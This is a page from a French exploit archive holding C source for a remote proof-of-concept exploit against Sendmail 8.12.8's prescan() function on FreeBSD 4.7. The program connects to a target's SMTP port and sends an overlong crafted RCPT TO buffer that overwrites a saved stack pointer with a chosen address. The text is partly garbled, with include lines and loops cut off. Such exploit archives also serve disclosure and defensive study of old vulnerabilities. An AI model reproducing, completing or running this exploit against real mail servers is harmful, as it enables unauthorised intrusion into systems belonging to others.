Sendmail <= 8.12.8 prescan() proof of concept BSD exploit

    
 
     * Version TXT Disponible ici *
/*
                              * Sendmail 8.12.8 prescan() PROOF OF CONCEPT exploit by bysin
                              * 
                              * This is to prove that the bug in sendmail 8.12.8 and below is vulnerable.
                              * On sucessful POC exploitation the program should crash with the following:
                              *
                              * Program received signal SIGSEGV, Segmentation fault.
                              * 0x5c5c5c5c in ?? ()
                              *
                              */

                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 

                              int maxarch=1;
                              struct arch {
                              char *os; // The OS
                              int pos; // The position of ebp in the stack, with the last byte being 0x00
                              int apos; // The amount of bytes after pvpbuf where ebp is located
                              unsigned long addr; // The pointer to the addr buffer
                              } archs[] = {
                              {"FreeBSD 4.7-RELEASE",180,28,0xbfbfdad1},
                              };


                              /////////////////////////////////////////////////////////

                              #define BUFSIZE 50096

                              void header() {
                              printf("Sendmail 8.12.8 prescan() exploit by bysin\n\n");
                              }

                              void printtargets() {
                              unsigned long i;
                              header();
                              printf("\t  Target\t Addr\t\t OS\n");
                              printf("\t-------------------------------------------\n");
                              for (i=0;i \n",argv[0]);
                              printtargets();
                              return 0;
                              }
                              target=atol(argv[2]);
                              if (target < 0 || target >= maxarch) {
                              printtargets();
                              return 0;
                              }

                              header();

                              if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                              printf("Unable to create socket\n");
                              exit(0);
                              }
                              server.sin_family = AF_INET;
                              server.sin_port = htons(25);
                              printf("Resolving address... ");
                              fflush(stdout);
                              if ((ipaddr = inet_addr(argv[1])) == -1) {
                              struct hostent *hostm;
                              if ((hostm=gethostbyname(argv[1])) == NULL) {
                              printf("Unable to resolve address\n");
                              exit(0);
                              }
                              memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
                              }
                              else server.sin_addr.s_addr = ipaddr;
                              memset(&(server.sin_zero), 0, 8);
                              printf("Address found\n");
                              printf("Connecting... ");
                              fflush(stdout);
                              if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) {
                              printf("Unable to connect\n");
                              exit(0);
                              }
                              printf("Connected\n");
                              printf("Sending exploit... \n");
                              fflush(stdout);

                              readsocket(sock,220);

                              writesocket(sock,"HELO \r\n");
                              readsocket(sock,250);

                              writesocket(sock,"MAIL FROM: \r\n");
                              readsocket(sock,250);

                              memset(buf,0,sizeof(buf));
                              strcpy(buf,"RCPT TO: ");
                              p=buf+strlen(buf);
                              for (i=1,j=0,m=0;i<1242;i++) {
                              if (!(i%256)) {
                              *p++=';';
                              j++;
                              }
                              else {
                              if (j < 4) *p++='A';
                              else {
                                if (m == archs[target].pos) pos=p;
                                //if (m > archs[target].pos) *p++='B'; else
                                *p++='A';
                                m++;
                              }
                              }
                              }
                              if (pos) memcpy(pos,(char*)&archs[target].addr,4);
                              *p++=';';
                              for (i=0;i

   

   

 Audits de Sécurité & Tests Intrusifs F-VNS Security™  Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits